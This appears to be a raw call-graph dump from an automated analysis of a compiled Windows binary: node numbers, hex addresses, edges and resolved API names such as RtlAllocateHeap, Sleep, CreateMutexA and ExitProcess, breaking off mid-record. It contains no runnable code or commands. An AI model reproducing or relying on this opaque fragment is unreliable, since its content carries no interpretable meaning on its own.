RtlAllocateHeap 10261 487f2a __cftof 10254->10261 10255->10252 10258 487e8b 10255->10258 10260 48d3e2 RtlAllocateHeap 10256->10260 10256->10263 10257->10249 10259 48d3e2 RtlAllocateHeap 10258->10259 10259->10263 10260->10263 10262 487f61 shared_ptr 10261->10262 10265 4a6c6a RtlAllocateHeap 10261->10265 10262->10226 10263->10254 10264 487f02 shared_ptr 10263->10264 10264->10226 10266 487f7c 10265->10266 10268 48c1b9 RtlAllocateHeap 10267->10268 10269 4891ea 10268->10269 10269->10231 10288 4a6a44 10289 4a6a5c 10288->10289 10290 4a6a52 10288->10290 10306 4a698d 10289->10306 10301 4ab655 10290->10301 10293 4a6a59 10294 4a6a76 10309 4a68ed 10294->10309 10297 4a6a8a 10299 4a6aa8 10297->10299 10300 4aadf5 ___free_lconv_mon RtlAllocateHeap 10297->10300 10298 4ab655 RtlAllocateHeap 10298->10297 10300->10299 10302 4ab662 10301->10302 10303 4ab679 10302->10303 10312 4a75c0 10302->10312 10303->10293 10320 4a690a 10306->10320 10308 4a699f 10308->10294 10468 4a683b 10309->10468 10317 4a75e3 10312->10317 10314 4a75cb __dosmaperr 10315 4a75f6 __dosmaperr RtlAllocateHeap 10314->10315 10316 4a75de 10315->10316 10316->10293 10318 4aa7c8 __dosmaperr RtlAllocateHeap 10317->10318 10319 4a75e8 10318->10319 10319->10314 10321 4a692a 10320->10321 10322 4a6921 10320->10322 10321->10322 10323 4aa671 __cftof 4 API calls 10321->10323 10322->10308 10324 4a694a 10323->10324 10328 4ab5fb 10324->10328 10329 4ab60e 10328->10329 10330 4a6960 10328->10330 10329->10330 10336 4af5ab 10329->10336 10332 4ab628 10330->10332 10333 4ab63b 10332->10333 10334 4ab650 10332->10334 10333->10334 10349 4ae6b1 10333->10349 10334->10322 10337 4af5b7 __dosmaperr 10336->10337 10338 4aa671 __cftof 4 API calls 10337->10338 10340 4af5c0 __dosmaperr 10338->10340 10339 4af606 10339->10330 10340->10339 10345 4af62c 10340->10345 10342 4af5ef __cftof 10342->10339 10343 4a8bec __cftof 4 API calls 10342->10343 10344 4af62b 10343->10344 10346 4af63a __cftof 10345->10346 10348 4af647 10345->10348 10347 4af35f __cftof RtlAllocateHeap 10346->10347 10346->10348 10347->10348 10348->10342 10350 4aa671 __cftof 4 API calls 10349->10350 10351 4ae6bb 10350->10351 10354 4ae5c9 10351->10354 10353 4ae6c1 10353->10334 10358 4ae5d5 __dosmaperr 10354->10358 10355 4ae5f6 10355->10353 10356 4ae5ef __cftof 10356->10355 10357 4a8bec __cftof 4 API calls 10356->10357 10359 4ae668 10357->10359 10358->10356 10362 4aadf5 ___free_lconv_mon RtlAllocateHeap 10358->10362 10360 4ae6a4 10359->10360 10365 4aa72e 10359->10365 10360->10353 10362->10356 10366 4aa739 __dosmaperr 10365->10366 10367 4aa745 10366->10367 10369 4ad82f __dosmaperr RtlAllocateHeap 10366->10369 10368 4a8bec __cftof 4 API calls 10367->10368 10371 4aa7be 10367->10371 10370 4aa7c7 10368->10370 10372 4aa769 __dosmaperr 10369->10372 10379 4ae4b0 10371->10379 10373 4aa771 __dosmaperr 10372->10373 10374 4aa7a5 10372->10374 10375 4aadf5 ___free_lconv_mon RtlAllocateHeap 10373->10375 10376 4aa49f __dosmaperr RtlAllocateHeap 10374->10376 10375->10367 10377 4aa7b0 10376->10377 10378 4aadf5 ___free_lconv_mon RtlAllocateHeap 10377->10378 10378->10367 10380 4ae5c9 __cftof 4 API calls 10379->10380 10381 4ae4c3 10380->10381 10398 4ae259 10381->10398 10383 4ae4dc 10383->10360 10385 4ab04b __cftof RtlAllocateHeap 10386 4ae4ed 10385->10386 10387 4ae51f 10386->10387 10401 4ae6c4 10386->10401 10390 4aadf5 ___free_lconv_mon RtlAllocateHeap 10387->10390 10389 4ae512 10391 4ae51a 10389->10391 10395 4ae535 __cftof 10389->10395 10392 4ae52d 10390->10392 10393 4a75f6 __dosmaperr RtlAllocateHeap 10391->10393 10392->10360 10393->10387 10394 4ae561 10394->10387 10406 4ae14b 10394->10406 10395->10394 10396 4aadf5 ___free_lconv_mon RtlAllocateHeap 10395->10396 10396->10394 10399 4a690a __cftof 4 API calls 10398->10399 10400 4ae26b 10399->10400 10400->10383 10400->10385 10402 4ae259 __cftof 4 API calls 10401->10402 10405 4ae6e4 __cftof 10402->10405 10403 4ae75a __cftof std::invalid_argument::invalid_argument 10403->10389 10405->10403 10410 4ae32f 10405->10410 10407 4ae157 __dosmaperr 10406->10407 10447 4ae198 10407->10447 10409 4ae16e __cftof 10409->10387 10411 4ae357 10410->10411 10417 4ae420 std::invalid_argument::invalid_argument 10410->10417 10411->10417 10418 4af1bf 10411->10418 10413 4ae3d7 10425 4b4dfe 10413->10425 10416 4b4dfe __cftof 4 API calls 10416->10417 10417->10403 10419 4a690a __cftof 4 API calls 10418->10419 10420 4af1df __cftof 10419->10420 10421 4ab04b __cftof RtlAllocateHeap 10420->10421 10422 4af29d std::invalid_argument::invalid_argument 10420->10422 10424 4af232 __cftof 10420->10424 10421->10424 10422->10413 10430 4af2c2 10424->10430 10426 4a690a __cftof 4 API calls 10425->10426 10427 4b4e11 10426->10427 10434 4b4c14 10427->10434 10429 4ae3f8 10429->10416 10431 4af2ce 10430->10431 10432 4af2df 10430->10432 10431->10432 10433 4aadf5 ___free_lconv_mon RtlAllocateHeap 10431->10433 10432->10422 10433->10432 10436 4b4c2f __cftof 10434->10436 10435 4b4dd8 std::invalid_argument::invalid_argument 10435->10429 10436->10435 10437 4ab04b __cftof RtlAllocateHeap 10436->10437 10439 4b4c98 __cftof 10436->10439 10437->10439 10438 4af2c2 __freea RtlAllocateHeap 10438->10435 10441 4b4d14 __cftof 10439->10441 10442 4ab04b __cftof RtlAllocateHeap 10439->10442 10444 4b4d5e __cftof 10439->10444 10440 4b4dc9 10443 4af2c2 __freea RtlAllocateHeap 10440->10443 10441->10438 10442->10444 10443->10441 10444->10440 10445 4b4df5 10444->10445 10446 4af2c2 __freea RtlAllocateHeap 10445->10446 10446->10441 10454 4abac8 10447->10454 10449 4ae1ba 10450 4abac8 __cftof RtlAllocateHeap 10449->10450 10451 4ae1d9 10450->10451 10452 4ae200 10451->10452 10453 4aadf5 ___free_lconv_mon RtlAllocateHeap 10451->10453 10452->10409 10453->10452 10455 4abad9 10454->10455 10459 4abad5 __cftof 10454->10459 10456 4abae0 10455->10456 10460 4abaf3 __cftof 10455->10460 10457 4a75f6 __dosmaperr RtlAllocateHeap 10456->10457 10458 4abae5 10457->10458 10461 4a6c5a ___std_exception_copy RtlAllocateHeap 10458->10461 10459->10449 10460->10459 10462 4abb21 10460->10462 10464 4abb2a 10460->10464 10461->10459 10463 4a75f6 __dosmaperr RtlAllocateHeap 10462->10463 10465 4abb26 10463->10465 10464->10459 10466 4a75f6 __dosmaperr RtlAllocateHeap 10464->10466 10467 4a6c5a ___std_exception_copy RtlAllocateHeap 10465->10467 10466->10465 10467->10459 10469 4a6849 10468->10469 10470 4a6863 10468->10470 10481 4a69cc 10469->10481 10472 4a686a 10470->10472 10474 4a6889 __cftof 10470->10474 10480 4a6853 10472->10480 10485 4a69e6 10472->10485 10475 4a69e6 RtlAllocateHeap 10474->10475 10476 4a689f __cftof 10474->10476 10475->10476 10477 4a75c0 __dosmaperr RtlAllocateHeap 10476->10477 10476->10480 10478 4a68ab 10477->10478 10479 4a75f6 __dosmaperr RtlAllocateHeap 10478->10479 10479->10480 10480->10297 10480->10298 10482 4a69d7 10481->10482 10483 4a69df 10481->10483 10484 4aadf5 ___free_lconv_mon RtlAllocateHeap 10482->10484 10483->10480 10484->10483 10486 4a69cc RtlAllocateHeap 10485->10486 10487 4a69f4 10486->10487 10490 4a6a25 10487->10490 10491 4ab04b __cftof RtlAllocateHeap 10490->10491 10492 4a6a05 10491->10492 10492->10480 9676 47a856 9677 47a870 9676->9677 9684 47a892 shared_ptr 9676->9684 9678 47a94e 9677->9678 9677->9684 9685 4a6c6a 9678->9685 9681 47a903 9682 47a953 Sleep CreateMutexA 9683 47a98e 9682->9683 9688 4880c0 9684->9688 9703 4a6bf6 9685->9703 9687 4a6c79 ___std_exception_copy 9691 4880de 9688->9691 9693 488104 9688->9693 9689 4881ee 9862 489270 9689->9862 9691->9681 9692 4881f3 9865 472480 9692->9865 9693->9689 9695 488158 9693->9695 9696 48817d 9693->9696 9695->9692 9857 48d3e2 9695->9857 9698 48d3e2 RtlAllocateHeap 9696->9698 9701 488169 __cftof 9696->9701 9698->9701 9700 4a6c6a RtlAllocateHeap 9700->9689 9701->9700 9702 4881d0 shared_ptr 9701->9702 9702->9681 9709 4aa7c8 9703->9709 9705 4a6c0f 9705->9687 9706 4a6c01 ___std_exception_copy 9706->9705 9707 4a6bf6 ___std_exception_copy RtlAllocateHeap 9706->9707 9708 4a6c66 9707->9708 9708->9687 9710 4aa7d2 __dosmaperr 9709->9710 9712 4aa7eb 9710->9712 9720 4ad82f 9710->9720 9712->9706 9713 4aa813 __dosmaperr 9714 4aa853 9713->9714 9715 4aa81b __dosmaperr 9713->9715 9728 4aa49f 9714->9728 9724 4aadf5 9715->9724 9719 4aadf5 ___free_lconv_mon RtlAllocateHeap 9719->9712 9723 4ad83c __dosmaperr 9720->9723 9721 4ad867 RtlAllocateHeap 9722 4ad87a __dosmaperr 9721->9722 9721->9723 9722->9713 9723->9721 9723->9722 9725 4aae00 9724->9725 9727 4aae1b __dosmaperr 9724->9727 9725->9727 9732 4a75f6 9725->9732 9727->9712 9729 4aa50d __dosmaperr 9728->9729 9735 4aa445 9729->9735 9731 4aa536 9731->9719 9733 4aa7c8 __dosmaperr RtlAllocateHeap 9732->9733 9734 4a75fb 9733->9734 9734->9727 9736 4aa451 __dosmaperr 9735->9736 9739 4aa626 9736->9739 9738 4aa473 __dosmaperr 9738->9731 9740 4aa65c __cftof 9739->9740 9741 4aa635 __cftof 9739->9741 9740->9738 9741->9740 9743 4af35f 9741->9743 9744 4af3df 9743->9744 9747 4af375 9743->9747 9746 4aadf5 ___free_lconv_mon RtlAllocateHeap 9744->9746 9769 4af42d 9744->9769 9748 4af401 9746->9748 9747->9744 9749 4af3a8 9747->9749 9753 4aadf5 ___free_lconv_mon RtlAllocateHeap 9747->9753 9750 4aadf5 ___free_lconv_mon RtlAllocateHeap 9748->9750 9755 4aadf5 ___free_lconv_mon RtlAllocateHeap 9749->9755 9770 4af3ca 9749->9770 9751 4af414 9750->9751 9754 4aadf5 ___free_lconv_mon RtlAllocateHeap 9751->9754 9752 4aadf5 ___free_lconv_mon RtlAllocateHeap 9756 4af3d4 9752->9756 9758 4af39d 9753->9758 9760 4af422 9754->9760 9761 4af3bf 9755->9761 9762 4aadf5 ___free_lconv_mon RtlAllocateHeap 9756->9762 9757 4af49b 9763 4aadf5 ___free_lconv_mon RtlAllocateHeap 9757->9763 9771 4aef3c 9758->9771 9759 4af43b 9759->9757 9765 4aadf5 RtlAllocateHeap ___free_lconv_mon 9759->9765 9766 4aadf5 ___free_lconv_mon RtlAllocateHeap 9760->9766 9799 4af03a 9761->9799 9762->9744 9768 4af4a1 9763->9768 9765->9759 9766->9769 9768->9740 9811 4af4d0 9769->9811 9770->9752 9772 4aef4d 9771->9772 9798 4af036 9771->9798 9773 4aef5e 9772->9773 9774 4aadf5 ___free_lconv_mon RtlAllocateHeap 9772->9774 9775 4aadf5 ___free_lconv_mon RtlAllocateHeap 9773->9775 9779 4aef70 9773->9779 9774->9773 9775->9779 9776 4aadf5 ___free_lconv_mon RtlAllocateHeap 9777 4aef82 9776->9777 9778 4aef94 9777->9778 9780 4aadf5 ___free_lconv_mon RtlAllocateHeap 9777->9780 9781 4aefa6 9778->9781 9782 4aadf5 ___free_lconv_mon RtlAllocateHeap 9778->9782 9779->9776 9779->9777 9780->9778 9783 4aefb8 9781->9783 9785 4aadf5 ___free_lconv_mon RtlAllocateHeap 9781->9785 9782->9781 9784 4aefca 9783->9784 9786 4aadf5 ___free_lconv_mon RtlAllocateHeap 9783->9786 9787 4aefdc 9784->9787 9788 4aadf5 ___free_lconv_mon RtlAllocateHeap 9784->9788 9785->9783 9786->9784 9789 4aefee 9787->9789 9790 4aadf5 ___free_lconv_mon RtlAllocateHeap 9787->9790 9788->9787 9791 4af000 9789->9791 9793 4aadf5 ___free_lconv_mon RtlAllocateHeap 9789->9793 9790->9789 9792 4af012 9791->9792 9794 4aadf5 ___free_lconv_mon RtlAllocateHeap 9791->9794 9795 4af024 9792->9795 9796 4aadf5 ___free_lconv_mon RtlAllocateHeap 9792->9796 9793->9791 9794->9792 9797 4aadf5 ___free_lconv_mon RtlAllocateHeap 9795->9797 9795->9798 9796->9795 9797->9798 9798->9749 9800 4af09f 9799->9800 9801 4af047 9799->9801 9800->9770 9802 4af057 9801->9802 9803 4aadf5 ___free_lconv_mon RtlAllocateHeap 9801->9803 9804 4af069 9802->9804 9805 4aadf5 ___free_lconv_mon RtlAllocateHeap 9802->9805 9803->9802 9806 4af07b 9804->9806 9808 4aadf5 ___free_lconv_mon RtlAllocateHeap 9804->9808 9805->9804 9807 4af08d 9806->9807 9809 4aadf5 ___free_lconv_mon RtlAllocateHeap 9806->9809 9807->9800 9810 4aadf5 ___free_lconv_mon RtlAllocateHeap 9807->9810 9808->9806 9809->9807 9810->9800 9812 4af4dd 9811->9812 9816 4af4fc 9811->9816 9812->9816 9817 4af0db 9812->9817 9815 4aadf5 ___free_lconv_mon RtlAllocateHeap 9815->9816 9816->9759 9818 4af0ec 9817->9818 9852 4af1b9 9817->9852 9853 4af0a3 9818->9853 9821 4af0a3 __cftof RtlAllocateHeap 9822 4af0ff 9821->9822 9823 4af0a3 __cftof RtlAllocateHeap 9822->9823 9824 4af10a 9823->9824 9825 4af0a3 __cftof RtlAllocateHeap 9824->9825 9826 4af115 9825->9826 9827 4af0a3 __cftof RtlAllocateHeap 9826->9827 9828 4af123 9827->9828 9829 4aadf5 ___free_lconv_mon RtlAllocateHeap 9828->9829 9830 4af12e 9829->9830 9831 4aadf5 ___free_lconv_mon RtlAllocateHeap 9830->9831 9832 4af139 9831->9832 9833 4aadf5 ___free_lconv_mon RtlAllocateHeap 9832->9833 9834 4af144 9833->9834 9835 4af0a3 __cftof RtlAllocateHeap 9834->9835 9836 4af152 9835->9836 9837 4af0a3 __cftof RtlAllocateHeap 9836->9837 9838 4af160 9837->9838 9839 4af0a3 __cftof RtlAllocateHeap 9838->9839 9840 4af171 9839->9840 9841 4af0a3 __cftof RtlAllocateHeap 9840->9841 9842 4af17f 9841->9842 9843 4af0a3 __cftof RtlAllocateHeap 9842->9843 9844 4af18d 9843->9844 9845 4aadf5 ___free_lconv_mon RtlAllocateHeap 9844->9845 9846 4af198 9845->9846 9847 4aadf5 ___free_lconv_mon RtlAllocateHeap 9846->9847 9848 4af1a3 9847->9848 9849 4aadf5 ___free_lconv_mon RtlAllocateHeap 9848->9849 9850 4af1ae 9849->9850 9851 4aadf5 ___free_lconv_mon RtlAllocateHeap 9850->9851 9851->9852 9852->9815 9854 4af0d6 9853->9854 9855 4af0c6 9853->9855 9854->9821 9855->9854 9856 4aadf5 ___free_lconv_mon RtlAllocateHeap 9855->9856 9856->9855 9858 472480 __dosmaperr ___std_exception_copy std::_Throw_future_error 9857->9858 9861 48d401 std::_Throw_future_error 9858->9861 9869 4a38af 9858->9869 9861->9701 9890 48c1b9 9862->9890 9866 47248e std::_Throw_future_error 9865->9866 9867 4a38af ___std_exception_copy RtlAllocateHeap 9866->9867 9868 4724c3 9867->9868 9870 4a38bc ___std_exception_copy 9869->9870 9874 4724c3 9869->9874 9871 4a38e9 9870->9871 9870->9874 9875 4aa1f1 9870->9875 9884 4a8ba3 9871->9884 9874->9701 9876 4aa1fe 9875->9876 9878 4aa20c 9875->9878 9876->9878 9882 4aa223 9876->9882 9877 4a75f6 __dosmaperr RtlAllocateHeap 9879 4aa214 9877->9879 9878->9877 9887 4a6c5a 9879->9887 9881 4aa21e 9881->9871 9882->9881 9883 4a75f6 __dosmaperr RtlAllocateHeap 9882->9883 9883->9879 9885 4aadf5 ___free_lconv_mon RtlAllocateHeap 9884->9885 9886 4a8bbb 9885->9886 9886->9874 9888 4a6bf6 ___std_exception_copy RtlAllocateHeap 9887->9888 9889 4a6c66 9888->9889 9889->9881 9893 48c123 9890->9893 9892 48c1ca std::_Throw_future_error 9896 4722e0 9893->9896 9895 48c135 9895->9892 9897 4a38af ___std_exception_copy RtlAllocateHeap 9896->9897 9898 472317 std::invalid_argument::invalid_argument 9897->9898 9898->9895 10498 48be50 10501 48bd8b 10498->10501 10500 48be66 std::_Throw_future_error 10502 4722e0 std::invalid_argument::invalid_argument RtlAllocateHeap 10501->10502 10503 48bd9f 10502->10503 10503->10500 10544 474276 10549 472410 10544->10549 10548 47428f 10550 472424 10549->10550 10564 48b52d 10550->10564 10553 473ce0 10554 473d42 10553->10554 10557 473d52 10553->10557 10555 487d50 RtlAllocateHeap 10554->10555 10555->10557 10556 48d3e2 RtlAllocateHeap 10558 473d84 10556->10558 10557->10556 10559 487d50 RtlAllocateHeap 10558->10559 10561 473e03 10558->10561 10559->10561 10560 473e9b shared_ptr 10560->10548 10561->10560 10562 4a6c6a RtlAllocateHeap 10561->10562 10563 473ec1 10562->10563 10572 4a3aed 10564->10572 10566 47242a 10566->10553 10567 48b5a5 ___std_exception_copy 10579 48b1ad 10567->10579 10568 48b598 10575 48af56 10568->10575 10583 4a4f29 10572->10583 10576 48af9f ___std_exception_copy 10575->10576 10578 48afb2 shared_ptr 10576->10578 10596 48b39f 10576->10596 10578->10566 10580 48b1d8 10579->10580 10582 48b1e1 shared_ptr 10579->10582 10581 48b39f 5 API calls 10580->10581 10581->10582 10582->10566 10591 4a4f37 10583->10591 10585 48b555 10585->10566 10585->10567 10585->10568 10586 4a4f2e __cftof 10586->10585 10587 4ad634 __cftof 4 API calls 10586->10587 10590 4a8bfc ___std_exception_copy 10586->10590 10587->10590 10588 4a65ed __cftof 3 API calls 10589 4a8c2f 10588->10589 10590->10588 10592 4a4f40 10591->10592 10593 4a4f43 10591->10593 10592->10586 10594 4a8ba3 ___std_exception_copy RtlAllocateHeap 10593->10594 10595 4a4f77 10593->10595 10594->10595 10595->10586 10597 48bedf InitOnceExecuteOnce 10596->10597 10599 48b3e1 10597->10599 10598 48b3e8 10598->10578 10599->10598 10607 4a6cbb 10599->10607 10608 4a6cc7 __dosmaperr 10607->10608 10609 4aa671 __cftof 4 API calls 10608->10609 10612 4a6ccc 10609->10612 10610 4a8bec __cftof 4 API calls 10611 4a6cf6 10610->10611 10612->10610 10631 47cc79 10632 47cc84 shared_ptr 10631->10632 10633 47ccda shared_ptr std::invalid_argument::invalid_argument 10632->10633 10634 4a6c6a RtlAllocateHeap 10632->10634 10635 47ce36 10634->10635 10636 487a00 RtlAllocateHeap 10635->10636 10637 47ce92 10636->10637 10641 475c10 10637->10641 10639 47ce9d 10692 47ca70 10639->10692 10712 475940 10641->10712 10643 475c54 10715 474b30 10643->10715 10646 475d17 shared_ptr std::invalid_argument::invalid_argument 10646->10639 10647 4a6c6a RtlAllocateHeap 10648 475d47 __cftof 10647->10648 10648->10648 10649 4880c0 RtlAllocateHeap 10648->10649 10651 475e3e 10649->10651 10650 475ea6 shared_ptr std::invalid_argument::invalid_argument 10650->10639 10651->10650 10652 4a6c6a RtlAllocateHeap 10651->10652 10653 475ed2 10652->10653 10654 475ffe shared_ptr std::invalid_argument::invalid_argument 10653->10654 10655 4a6c6a RtlAllocateHeap 10653->10655 10654->10639 10656 47601b 10655->10656 10657 4880c0 RtlAllocateHeap 10656->10657 10658 476089 10657->10658 10659 4880c0 RtlAllocateHeap 10658->10659 10660 4760bd 10659->10660 10661 4880c0 RtlAllocateHeap 10660->10661 10662 4760ee 10661->10662 10663 4880c0 RtlAllocateHeap 10662->10663 10664 47611f 10663->10664 10665 4880c0 RtlAllocateHeap 10664->10665 10667 476150 10665->10667 10666 4765b1 shared_ptr std::invalid_argument::invalid_argument 10666->10639 10667->10666 10668 4a6c6a RtlAllocateHeap 10667->10668 10669 4765dc 10668->10669 10670 487a00 RtlAllocateHeap 10669->10670 10671 4766a6 10670->10671 10672 475c10 4 API calls 10671->10672 10673 4766ac 10672->10673 10674 475c10 4 API calls 10673->10674 10675 4766b1 10674->10675 10722 4722c0 10675->10722 10677 4766c9 shared_ptr 10678 487a00 RtlAllocateHeap 10677->10678 10679 476732 10678->10679 10680 475c10 4 API calls 10679->10680 10681 47673d 10680->10681 10682 4722c0 4 API calls 10681->10682 10691 476757 shared_ptr 10682->10691 10683 476852 10684 4880c0 RtlAllocateHeap 10683->10684 10686 47689c 10684->10686 10685 487a00 RtlAllocateHeap 10685->10691 10687 4880c0 RtlAllocateHeap 10686->10687 10689 4768e3 shared_ptr std::invalid_argument::invalid_argument 10687->10689 10688 475c10 4 API calls 10688->10691 10689->10639 10690 4722c0 4 API calls 10690->10691 10691->10683 10691->10685 10691->10688 10691->10690 10693 47cadd 10692->10693 10694 487a00 RtlAllocateHeap 10693->10694 10698 47cc87 10693->10698 10696 47ccee 10694->10696 10695 47ccda shared_ptr std::invalid_argument::invalid_argument 10697 475c10 4 API calls 10696->10697 10699 47ccf9 10697->10699 10698->10695 10700 4a6c6a RtlAllocateHeap 10698->10700 11067 479030 10699->11067 10702 47ce36 10700->10702 10704 487a00 RtlAllocateHeap 10702->10704 10703 47cd0d 11080 488220 10703->11080 10706 47ce92 10704->10706 10708 475c10 4 API calls 10706->10708 10707 47cd1f 10711 488f40 RtlAllocateHeap 10707->10711 10709 47ce9d 10708->10709 10710 47ca70 4 API calls 10709->10710 10711->10698 10725 487f80 10712->10725 10714 47596b 10714->10643 10716 474dc2 10715->10716 10720 474b92 10715->10720 10716->10646 10716->10647 10717 474ce5 10717->10716 10719 488ca0 RtlAllocateHeap 10717->10719 10719->10717 10720->10717 10740 4a6da6 10720->10740 10745 488ca0 10720->10745 10781 472280 10722->10781 10728 487f9e __cftof 10725->10728 10730 487fc7 10725->10730 10726 4880b3 10727 489270 RtlAllocateHeap 10726->10727 10729 4880b8 10727->10729 10728->10714 10733 472480 RtlAllocateHeap 10729->10733 10730->10726 10731 48801b 10730->10731 10732 48803e 10730->10732 10731->10729 10735 48d3e2 RtlAllocateHeap 10731->10735 10736 48d3e2 RtlAllocateHeap 10732->10736 10737 48802c __cftof 10732->10737 10734 4880bd 10733->10734 10735->10737 10736->10737 10738 4a6c6a RtlAllocateHeap 10737->10738 10739 488095 shared_ptr 10737->10739 10738->10726 10739->10714 10741 4a6dc2 10740->10741 10742 4a6db4 10740->10742 10741->10720 10760 4a6d19 10742->10760 10746 488dc9 10745->10746 10747 488cc3 10745->10747 10748 489270 RtlAllocateHeap 10746->10748 10750 488d2f 10747->10750 10751 488d05 10747->10751 10749 488dce 10748->10749 10752 472480 RtlAllocateHeap 10749->10752 10755 48d3e2 RtlAllocateHeap 10750->10755 10758 488d16 __cftof 10750->10758 10751->10749 10753 488d10 10751->10753 10752->10758 10754 48d3e2 RtlAllocateHeap 10753->10754 10754->10758 10755->10758 10756 4a6c6a RtlAllocateHeap 10757 488dd8 10756->10757 10758->10756 10759 488d8b shared_ptr __cftof 10758->10759 10759->10720 10761 4a690a __cftof 4 API calls 10760->10761 10762 4a6d2c 10761->10762 10765 4a6d52 10762->10765 10764 4a6d3d 10764->10720 10766 4a6d8f 10765->10766 10767 4a6d5f 10765->10767 10776 4ab67d 10766->10776 10769 4a6d6e 10767->10769 10771 4ab6a1 10767->10771 10769->10764 10772 4a690a __cftof 4 API calls 10771->10772 10773 4ab6be 10772->10773 10774 4af1bf __cftof 4 API calls 10773->10774 10775 4ab6ce std::invalid_argument::invalid_argument 10773->10775 10774->10775 10775->10769 10777 4aa671 __cftof 4 API calls 10776->10777 10778 4ab688 10777->10778 10779 4ab5fb __cftof 4 API calls 10778->10779 10780 4ab698 10779->10780 10780->10769 10782 472296 10781->10782 10785 4a87f8 10782->10785 10788 4a7609 10785->10788 10787 4722a4 10787->10677 10789 4a7649 10788->10789 10790 4a7631 10788->10790 10789->10790 10792 4a7651 10789->10792 10791 4a75f6 __dosmaperr RtlAllocateHeap 10790->10791 10794 4a7636 10791->10794 10793 4a690a __cftof 4 API calls 10792->10793 10796 4a7661 10793->10796 10795 4a6c5a ___std_exception_copy RtlAllocateHeap 10794->10795 10797 4a7641 std::invalid_argument::invalid_argument 10795->10797 10801 4a7bc4 10796->10801 10797->10787 10817 4a868d 10801->10817 10803 4a7bd5 10804 4a76e8 10803->10804 10805 4a7be4 10803->10805 10824 4a7d15 10803->10824 10832 4a8168 10803->10832 10837 4a7dc2 10803->10837 10842 4a7de8 10803->10842 10871 4a7f36 10803->10871 10814 4a7a19 10804->10814 10806 4a75f6 __dosmaperr RtlAllocateHeap 10805->10806 10807 4a7be9 10806->10807 10808 4a6c5a ___std_exception_copy RtlAllocateHeap 10807->10808 10808->10804 10815 4aadf5 ___free_lconv_mon RtlAllocateHeap 10814->10815 10816 4a7a29 10815->10816 10816->10797 10818 4a8692 10817->10818 10819 4a86a5 10817->10819 10820 4a75f6 __dosmaperr RtlAllocateHeap 10818->10820 10819->10803 10821 4a8697 10820->10821 10822 4a6c5a ___std_exception_copy RtlAllocateHeap 10821->10822 10823 4a86a2 10822->10823 10823->10803 10893 4a7d34 10824->10893 10826 4a7d1a 10827 4a7d31 10826->10827 10828 4a75f6 __dosmaperr RtlAllocateHeap 10826->10828 10827->10803 10829 4a7d23 10828->10829 10830 4a6c5a ___std_exception_copy RtlAllocateHeap 10829->10830 10831 4a7d2e 10830->10831 10831->10803 10833 4a8178 10832->10833 10834 4a8171 10832->10834 10833->10803 10902 4a7b50 10834->10902 10838 4a7dcb 10837->10838 10839 4a7dd2 10837->10839 10840 4a7b50 4 API calls 10838->10840 10839->10803 10841 4a7dd1 10840->10841 10841->10803 10843 4a7e09 10842->10843 10844 4a7def 10842->10844 10845 4a75f6 __dosmaperr RtlAllocateHeap 10843->10845 10848 4a7e39 10843->10848 10846 4a7fbb 10844->10846 10847 4a7f4f 10844->10847 10844->10848 10849 4a7e25 10845->10849 10850 4a7fc2 10846->10850 10851 4a8001 10846->10851 10859 4a7f92 10846->10859 10847->10859 10862 4a7f5b 10847->10862 10848->10803 10852 4a6c5a ___std_exception_copy RtlAllocateHeap 10849->10852 10855 4a7f69 10850->10855 10856 4a7fc7 10850->10856 10961 4a8604 10851->10961 10854 4a7e30 10852->10854 10854->10803 10869 4a7f77 10855->10869 10870 4a7f8b 10855->10870 10955 4a8241 10855->10955 10856->10859 10861 4a7fcc 10856->10861 10859->10869 10859->10870 10946 4a8420 10859->10946 10860 4a7fa2 10860->10870 10932 4a8390 10860->10932 10863 4a7fdf 10861->10863 10864 4a7fd1 10861->10864 10862->10855 10862->10860 10862->10869 10940 4a8571 10863->10940 10864->10870 10936 4a85e5 10864->10936 10869->10870 10964 4a86ea 10869->10964 10870->10803 10872 4a7fbb 10871->10872 10873 4a7f4f 10871->10873 10874 4a7fc2 10872->10874 10875 4a8001 10872->10875 10880 4a7f92 10872->10880 10879 4a7f5b 10873->10879 10873->10880 10876 4a7f69 10874->10876 10877 4a7fc7 10874->10877 10878 4a8604 RtlAllocateHeap 10875->10878 10882 4a8241 4 API calls 10876->10882 10891 4a7f77 10876->10891 10892 4a7f8b 10876->10892 10877->10880 10883 4a7fcc 10877->10883 10878->10891 10879->10876 10884 4a7fa2 10879->10884 10879->10891 10881 4a8420 RtlAllocateHeap 10880->10881 10880->10891 10880->10892 10881->10891 10882->10891 10885 4a7fdf 10883->10885 10886 4a7fd1 10883->10886 10888 4a8390 4 API calls 10884->10888 10884->10892 10887 4a8571 RtlAllocateHeap 10885->10887 10889 4a85e5 RtlAllocateHeap 10886->10889 10886->10892 10887->10891 10888->10891 10889->10891 10890 4a86ea 4 API calls 10890->10892 10891->10890 10891->10892 10892->10803 10896 4a7d5e 10893->10896 10895 4a7d40 10895->10826 10898 4a7d80 10896->10898 10897 4a7db7 10897->10895 10898->10897 10899 4a75f6 __dosmaperr RtlAllocateHeap 10898->10899 10900 4a7dac 10899->10900 10901 4a6c5a ___std_exception_copy RtlAllocateHeap 10900->10901 10901->10897 10903 4a7b67 10902->10903 10904 4a7b62 10902->10904 10910 4a8ab6 10903->10910 10905 4a75f6 __dosmaperr RtlAllocateHeap 10904->10905 10905->10903 10908 4a75f6 __dosmaperr RtlAllocateHeap 10909 4a7b99 10908->10909 10909->10803 10911 4a8ad1 10910->10911 10914 4a8868 10911->10914 10915 4a868d RtlAllocateHeap 10914->10915 10918 4a887a 10915->10918 10916 4a88b3 10917 4a690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 10916->10917 10924 4a88bf 10917->10924 10918->10916 10919 4a888f 10918->10919 10931 4a7b85 10918->10931 10920 4a75f6 __dosmaperr RtlAllocateHeap 10919->10920 10921 4a8894 10920->10921 10923 4a6c5a ___std_exception_copy RtlAllocateHeap 10921->10923 10922 4a6d52 GetPEB ExitProcess GetPEB RtlAllocateHeap 10922->10924 10923->10931 10924->10922 10925 4a88ee 10924->10925 10927 4a8a8d RtlAllocateHeap 10925->10927 10928 4a8958 10925->10928 10926 4a8a8d RtlAllocateHeap 10929 4a8a20 10926->10929 10927->10928 10928->10926 10930 4a75f6 __dosmaperr RtlAllocateHeap 10929->10930 10929->10931 10930->10931 10931->10908 10931->10909 10933 4a83ab 10932->10933 10934 4a83dd 10933->10934 10968 4ac88e 10933->10968 10934->10869 10937 4a85f1 10936->10937 10938 4a8420 RtlAllocateHeap 10937->10938 10939 4a8603 10938->10939 10939->10869 10944 4a8586 10940->10944 10941 4a75f6 __dosmaperr RtlAllocateHeap 10942 4a858f 10941->10942 10943 4a6c5a ___std_exception_copy 